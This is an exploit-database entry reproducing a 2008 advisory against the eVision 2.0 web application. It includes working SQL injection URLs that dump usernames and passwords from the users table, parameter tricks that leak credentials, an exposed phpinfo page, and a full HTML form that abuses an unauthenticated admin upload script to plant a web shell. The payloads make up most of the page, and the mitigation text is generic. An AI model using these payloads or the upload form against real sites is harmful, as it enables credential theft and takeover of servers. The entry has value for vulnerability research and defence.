eVision 2.0 Sql Injection/Remote File Upload/IG

vendor:

eVision 2.0

by:

IRCRASH (R3d.W0rm (Sina Yazdanmehr))

7.5

CVSS

HIGH

Sql Injection/Remote File Upload/IG

CWE

Product Name: eVision 2.0

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

eVision 2.0 Sql Injection/Remote File Upload/IG

A vulnerability exists in eVision 2.0 which allows an attacker to perform Sql Injection/Remote File Upload/IG. The attacker can exploit this vulnerability by sending malicious requests to the vulnerable application. The vulnerable application is hosted on http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz. The attacker can use the DORK :( to find vulnerable sites. The attacker can use the Blind injection http://Site/print.php?id=1'+and+1=1/* and http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/* to get the username and password. The attacker can use the User http://Site/iframe.php?field=username&module=users/* and Pass http://Site/iframe.php?field=pass&module=users/* to get the username and password. The attacker can also use the http://Site/admin/phpinfo.php to get the information about the server.

Mitigation:

The application should be updated to the latest version and all the security patches should be applied. The application should be tested for any vulnerabilities and the security should be tightened. The application should be monitored for any suspicious activities.

Source

Exploit-DB raw data:

#####################################################################################
####              eVision 2.0 Sql Injection/Remote File Upload/IG                ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
#                                                                                   #
#DORK :  :(                                                                           #
#                                                                                   #
#####################################################################################
#                                [Sql Injection]                                    #
#                                                                                   #
#Blind : http://Site/print.php?id=1'+and+1=1/*                                      #
#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=username&module=users/*                        #
#Pass : http://Site/iframe.php?field=pass&module=users/*                            #
#                                     [IG]                                          #
#http://Site/admin/phpinfo.php                                                      #
#                                                                                   #
#                               [Remote File Upload]                                #
#Exploit :                                                                          #
#                                                                                   #
#<html>                                                                             #
#<!--                                                                               #
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr))                                   # 
#Http://IrCrash.Com                                                                 #
#//-->                                                                              #
#<form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data>
#<input type=file name='file_upload'>                                               #
#<input type=hidden name=insert value=1>                                            #
#<input type=hidden name=s_rc value='file://'>                                      #
#<input type=submit>                                                                #
#</form>                                                                            #
#</html>                                                                            #
#Your shell save in http://Site/imagebank/                                          #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-02]